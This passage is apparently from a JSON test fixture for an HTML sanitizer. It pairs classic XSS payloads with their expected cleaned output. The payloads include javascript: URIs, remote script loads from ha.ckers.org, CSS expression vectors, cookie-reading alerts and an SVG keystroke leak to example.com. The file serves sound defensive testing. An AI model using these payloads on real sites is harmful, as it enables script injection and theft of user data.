493 "data": "<span class=foo>Some text</span>\n<a class=bar href=\"http://www.example.org\">www.example.org</a>\n\n<script src=\"http://code.jquery.com/jquery-1.4.4.js\"></script>\n<script>\n$(\"span.foo\").click(function() {\nalert('foo');\n$(\"a.bar\").click();\n});\n$(\"a.bar\").click(function() {\nalert('bar');\nlocation=\"http://html5sec.org\";\n});\n</script>",
494 "sanitized": "<html><head></head><body><span class=\"foo\">Some text</span>\n<a class=\"bar\" href=\"http://www.example.org\">www.example.org</a>\n\n\n</body></html>"
495 },
496 {
497 "data": "<script src=\"/\\example.com\\foo.js\"></script> // Safari 5.0, Chrome 9, 10\n<script src=\"\\\\example.com\\foo.js\"></script> // Safari 5.0",
498 "sanitized": "<html><head> </head><body>// Safari 5.0, Chrome 9, 10\n // Safari 5.0</body></html>"
499 },
500 {
501 "data": "<?xml version=\"1.0\"?>\r\n<?xml-stylesheet type=\"text/xml\" href=\"#stylesheet\"?>\r\n<!DOCTYPE doc [\r\n<!ATTLIST xsl:stylesheet\r\n id ID #REQUIRED>]>\r\n<svg xmlns=\"http://www.w3.org/2000/svg\">\r\n <xsl:stylesheet id=\"stylesheet\" version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">\r\n <xsl:template match=\"/\">\r\n <iframe xmlns=\"http://www.w3.org/1999/xhtml\" src=\"javascript:alert(1)\"></iframe>\r\n </xsl:template>\r\n </xsl:stylesheet>\r\n <circle fill=\"red\" r=\"40\"></circle>\r\n</svg>",
502 "sanitized": "<!DOCTYPE doc>\n<html><head></head><body>]>\n\n \n \n \n \n \n \n</body></html>"
503 },
504 {
505 "data": "<object id=\"x\" classid=\"clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598\"></object>\r\n<object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" onqt_error=\"alert(1)\" style=\"behavior:url(#x);\"><param name=postdomevents /></object>",
506 "sanitized": "<html><head></head><body>\n</body></html>"
507 },
508 {
509 "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" id=\"x\">\r\n<listener event=\"load\" handler=\"#y\" xmlns=\"http://www.w3.org/2001/xml-events\" observer=\"x\"/>\r\n<handler id=\"y\">alert(1)</handler>\r\n</svg>",
510 "sanitized": "<html><head></head><body>\n\nalert(1)\n</body></html>"
511 },
512 {
513 "data": "<svg><style><img/src=x onerror=alert(1)// </b>",
514 "sanitized": "<html><head></head><body></body></html>"
515 },
516 {
517 "data": "<svg>\n<image style='filter:url(\"data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>\")'>\n<!--\nSame effect with\n<image filter='...'>\n-->\n</svg>",
518 "sanitized": "<html><head></head><body>\n\n\n</body></html>"
519 },
520 {
521 "data": "<math href=\"javascript:alert(1)\">CLICKME</math>\r\n\r\n<math>\r\n<!-- up to FF 13 -->\r\n<maction actiontype=\"statusline#http://google.com\" xlink:href=\"javascript:alert(2)\">CLICKME</maction>\r\n\r\n<!-- FF 14+ -->\r\n<maction actiontype=\"statusline\" xlink:href=\"javascript:alert(3)\">CLICKME<mtext>http://http://google.com</mtext></maction>\r\n</math>",
522 "sanitized": "<html><head></head><body><math>CLICKME</math>\n\n<math>\n\n<maction actiontype=\"statusline#http://google.com\">CLICKME</maction>\n\n\n<maction actiontype=\"statusline\">CLICKME<mtext>http://http://google.com</mtext></maction>\n</math></body></html>"
523 },
524 {
525 "data": "<b>drag and drop one of the following strings to the drop box:</b>\r\n<br/><hr/>\r\njAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\nfeed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\nfeed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b>\r\n<br/><hr/>\r\nfeed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\n<div id=\"dropbox\" style=\"height: 360px;width: 500px;border: 5px solid #000;position: relative;\" ondragover=\"event.preventDefault()\">+ Drop Box +</div>",
526 "sanitized": "<html><head></head><body><b>drag and drop one of the following strings to the drop box:</b>\n<br><hr>\njAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\nfeed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\nfeed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b>\n<br><hr>\nfeed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\n<div id=\"dropbox\">+ Drop Box +</div></body></html>"
527 },
528 {
529 "data": "<!doctype html>\r\n<form>\r\n<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>\r\n<br>\r\n<input name=\"secret\" type=\"password\">\r\n</form>\r\n<!-- injection --><svg height=\"50px\">\r\n<image xmlns:xlink=\"http://www.w3.org/1999/xlink\">\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(a)\" to=\"//example.com/?a\" />\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(b)\" to=\"//example.com/?b\" />\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(c)\" to=\"//example.com/?c\" />\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(d)\" to=\"//example.com/?d\" />\r\n</image>\r\n</svg>",
530 "sanitized": "<!DOCTYPE html>\n<html><head></head><body>\n<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>\n<br>\n\n\n\n\n\n\n\n\n\n</body></html>"
531 },
532 {
533 "data": "<!-- `<img/src=xx:xx onerror=alert(1)//--!>",
534 "sanitized": "<html><head></head><body></body></html>"
535 },
536 {
537 "data": "<xmp>\r\n<%\r\n</xmp>\r\n<img alt='%></xmp><img src=xx:x onerror=alert(1)//'>\r\n\r\n<script>\r\nx='<%'\r\n</script> %>/\r\nalert(2)\r\n</script>\r\n\r\nXXX\r\n<style>\r\n*['<!--']{}\r\n</style>\r\n-->{}\r\n*{color:red}</style>",
538 "sanitized": "<html><head></head><body>\n<%\n\n<img alt=\"%></xmp><img src=xx:x onerror=alert(1)//\">\n\n %>/\nalert(2)\n\n\nXXX\n\n-->{}\n*{color:red}</body></html>"
539 },
540 {
541 "data": "<?xml-stylesheet type=\"text/xsl\" href=\"#\" ?>\r\n<stylesheet xmlns=\"http://www.w3.org/TR/WD-xsl\">\r\n<template match=\"/\">\r\n<eval>new ActiveXObject('htmlfile').parentWindow.alert(1)</eval>\r\n<if expr=\"new ActiveXObject('htmlfile').parentWindow.alert(2)\"></if>\r\n</template>\r\n</stylesheet>",
542 "sanitized": "<html><head></head><body>\n\n</body></html>"
543 },
544 {
545 "data": "<form action=\"\" method=\"post\">\r\n<input name=\"username\" value=\"admin\" />\r\n<input name=\"password\" type=\"password\" value=\"secret\" />\r\n<input name=\"injected\" value=\"injected\" dirname=\"password\" />\r\n<input type=\"submit\">\r\n</form>",
546 "sanitized": "<html><head></head><body>\n\n\n\n\n</body></html>"
547 },
548 {
549 "data": "<SCRIPT>alert('XSS');</SCRIPT>",
550 "sanitized": "<html><head></head><body></body></html>"
551 },
552 {
553 "data": "'';!--\"<XSS>=&{()}",
554 "sanitized": "<html><head></head><body>'';!--\"=&{()}</body></html>"
555 },
556 {
557 "data": "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>",
558 "sanitized": "<html><head></head><body></body></html>"
559 },
560 {
561 "data": "<IMG SRC=\"javascript:alert('XSS');\">",
562 "sanitized": "<html><head></head><body><img></body></html>"
563 },
564 {
565 "data": "<IMG SRC=javascript:alert('XSS')>",
566 "sanitized": "<html><head></head><body><img></body></html>"
567 },
568 {
569 "data": "<IMG SRC=JaVaScRiPt:alert('XSS')>",
570 "sanitized": "<html><head></head><body><img></body></html>"
571 },
572 {
573 "data": "<IMG SRC=javascript:alert("XSS")>",
574 "sanitized": "<html><head></head><body><img></body></html>"
575 },
576 {
577 "data": "<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>",
578 "sanitized": "<html><head></head><body><img></body></html>"
579 },
580 {
581 "data": "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
582 "sanitized": "<html><head></head><body><img></body></html>"
583 },
584 {
585 "data": "SRC=
<IMG 6;avascript:alert('XSS')>",
586 "sanitized": "<html><head></head><body>SRC=\n<img></body></html>"
587 },
588 {
589 "data": "<IMG SRC=javascript:alert('XSS')>",
590 "sanitized": "<html><head></head><body><img></body></html>"
591 },
592 {
593 "data": "<IMG SRC=javascript:alert('XSS')>",
594 "sanitized": "<html><head></head><body><img></body></html>"
595 },
596 {
597 "data": "<IMG SRC=\"javascript:alert('XSS');\">",
598 "sanitized": "<html><head></head><body><img></body></html>"
599 },
600 {
601 "data": "<IMG SRC=\"jav	ascript:alert('XSS');\">",
602 "sanitized": "<html><head></head><body><img></body></html>"
603 },
604 {
605 "data": "<IMG SRC=\"jav
ascript:alert('XSS');\">",
606 "sanitized": "<html><head></head><body><img></body></html>"
607 },
608 {
609 "data": "<IMG SRC=\"jav
ascript:alert('XSS');\">",
610 "sanitized": "<html><head></head><body><img></body></html>"
611 },
612 {
613 "data": "<IMG SRC=\"  javascript:alert('XSS');\">",
614 "sanitized": "<html><head></head><body><img></body></html>"
615 },
616 {
617 "data": "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
618 "sanitized": "<html><head></head><body></body></html>"
619 },
620 {
621 "data": "<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>",
622 "sanitized": "<html><head></head><body></body></html>"
623 },
624 {
625 "data": "<IMG SRC=\"javascript:alert('XSS')\"",
626 "sanitized": "<html><head></head><body></body></html>"
627 },
628 {
629 "data": "<SCRIPT>a=/XSS/",
630 "sanitized": "<html><head></head><body></body></html>"
631 },
632 {
633 "data": "\\\";alert('XSS');//",
634 "sanitized": "<html><head></head><body>\\\";alert('XSS');//</body></html>"
635 },
636 {
637 "data": "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">",
638 "sanitized": "<html><head></head><body></body></html>"
639 },
640 {
641 "data": "<BODY BACKGROUND=\"javascript:alert('XSS')\">",
642 "sanitized": "<html><head></head><body></body></html>"
643 },
644 {
645 "data": "<BODY ONLOAD=alert('XSS')>",
646 "sanitized": "<html><head></head><body></body></html>"
647 },
648 {
649 "data": "<IMG DYNSRC=\"javascript:alert('XSS')\">",
650 "sanitized": "<html><head></head><body><img></body></html>"
651 },
652 {
653 "data": "<IMG LOWSRC=\"javascript:alert('XSS')\">",
654 "sanitized": "<html><head></head><body><img></body></html>"
655 },
656 {
657 "data": "<BGSOUND SRC=\"javascript:alert('XSS');\">",
658 "sanitized": "<html><head></head><body></body></html>"
659 },
660 {
661 "data": "<BR SIZE=\"&{alert('XSS')}\">",
662 "sanitized": "<html><head></head><body><br></body></html>"
663 },
664 {
665 "data": "<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>",
666 "sanitized": "<html><head></head><body></body></html>"
667 },
668 {
669 "data": "<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">",
670 "sanitized": "<html><head></head><body></body></html>"
671 },
672 {
673 "data": "<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">",
674 "sanitized": "<html><head></head><body></body></html>"
675 },
676 {
677 "data": "<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>",
678 "sanitized": "<html><head></head><body></body></html>"
679 },
680 {
681 "data": "<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">",
682 "sanitized": "<html><head></head><body></body></html>"
683 },
684 {
685 "data": "<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>",
686 "sanitized": "<html><head></head><body></body></html>"
687 },
688 {
689 "data": "<IMG SRC='vbscript:msgbox(\"XSS\")'>",
690 "sanitized": "<html><head></head><body><img></body></html>"
691 },
692 {
693 "data": "<IMG SRC=\"mocha:[code]\">",
694 "sanitized": "<html><head></head><body><img></body></html>"
695 },
696 {
697 "data": "<IMG SRC=\"livescript:[code]\">",
698 "sanitized": "<html><head></head><body><img></body></html>"
699 },
700 {
701 "data": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">",
702 "sanitized": "<html><head></head><body></body></html>"
703 },
704 {
705 "data": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">",
706 "sanitized": "<html><head></head><body></body></html>"
707 },
708 {
709 "data": "<META HTTP-EQUIV=\"Link\" Content=\"<javascript:alert('XSS')>; REL=stylesheet\">",
710 "sanitized": "<html><head></head><body></body></html>"
711 },
712 {
713 "data": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">",
714 "sanitized": "<html><head></head><body></body></html>"
715 },
716 {
717 "data": "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>",
718 "sanitized": "<html><head></head><body></body></html>"
719 },
720 {
721 "data": "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>",
722 "sanitized": "<html><head></head></html>"
723 },
724 {
725 "data": "<TABLE BACKGROUND=\"javascript:alert('XSS')\">",
726 "sanitized": "<html><head></head><body><table></table></body></html>"
727 },
728 {
729 "data": "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
730 "sanitized": "<html><head></head><body><div></div></body></html>"
731 },
732 {
733 "data": "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
734 "sanitized": "<html><head></head><body><div></div></body></html>"
735 },
736 {
737 "data": "<DIV STYLE=\"width: expression(alert('XSS'));\">",
738 "sanitized": "<html><head></head><body><div></div></body></html>"
739 },
740 {
741 "data": "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>",
742 "sanitized": "<html><head></head><body></body></html>"
743 },
744 {
745 "data": "<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">",
746 "sanitized": "<html><head></head><body><img></body></html>"
747 },
748 {
749 "data": "<XSS STYLE=\"xss:expression(alert('XSS'))\">",
750 "sanitized": "<html><head></head><body></body></html>"
751 },
752 {
753 "data": "exp/*<XSS STYLE='no\\xss:noxss(\"*//*\");",
754 "sanitized": "<html><head></head><body>exp/*</body></html>"
755 },
756 {
757 "data": "<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>",
758 "sanitized": "<html><head></head><body></body></html>"
759 },
760 {
761 "data": "<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>",
762 "sanitized": "<html><head></head><body><a class=\"XSS\"></a></body></html>"
763 },
764 {
765 "data": "<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>",
766 "sanitized": "<html><head></head><body></body></html>"
767 },
768 {
769 "data": "<BASE HREF=\"javascript:alert('XSS');//\">",
770 "sanitized": "<html><head></head><body></body></html>"
771 },
772 {
773 "data": "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>",
774 "sanitized": "<html><head></head><body></body></html>"
775 },
776 {
777 "data": "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>",
778 "sanitized": "<html><head></head><body></body></html>"
779 },
780 {
781 "data": "getURL(\"javascript:alert('XSS')\")",
782 "sanitized": "<html><head></head><body>getURL(\"javascript:alert('XSS')\")</body></html>"
783 },
784 {
785 "data": "a=\"get\";",
786 "sanitized": "<html><head></head><body>a=\"get\";</body></html>"
787 },
788 {
789 "data": "<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas<![CDATA[cript:alert('XSS');\">",
790 "sanitized": "<html><head></head><body></body></html>"
791 },
792 {
793 "data": "<XML SRC=\"http://ha.ckers.org/xsstest.xml\" ID=I></XML>",
794 "sanitized": "<html><head></head><body></body></html>"
795 },
796 {
797 "data": "<HTML><BODY>",
798 "sanitized": "<html><head></head><body></body></html>"
799 },
800 {
801 "data": "<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>",
802 "sanitized": "<html><head></head><body></body></html>"
803 },
804 {
805 "data": "<!--#exec cmd=\"/bin/echo '<SCRIPT SRC'\"--><!--#exec cmd=\"/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'\"-->",
806 "sanitized": "<html><head></head><body></body></html>"
807 },
808 {
809 "data": "<? echo('<SCR)';",
810 "sanitized": "<html><head></head><body></body></html>"
811 },
812 {
813 "data": "<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">",
814 "sanitized": "<html><head></head><body></body></html>"
815 },
816 {
817 "data": "<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-",
818 "sanitized": "<html><head> </head><body>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</body></html>"
819 },
820 {
821 "data": "<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
822 "sanitized": "<html><head></head><body></body></html>"
823 },
824 {
825 "data": "<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
826 "sanitized": "<html><head></head><body></body></html>"
827 },
828 {
829 "data": "<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
830 "sanitized": "<html><head></head><body></body></html>"
831 },
832 {
833 "data": "<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
834 "sanitized": "<html><head></head><body></body></html>"
835 },
836 {
837 "data": "<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC",
838 "sanitized": "<html><head></head><body>PT SRC</body></html>"
839 },
840 {
841 "data": "",
842 "sanitized": "<html><head></head><body></body></html>"
843 }
844 ]
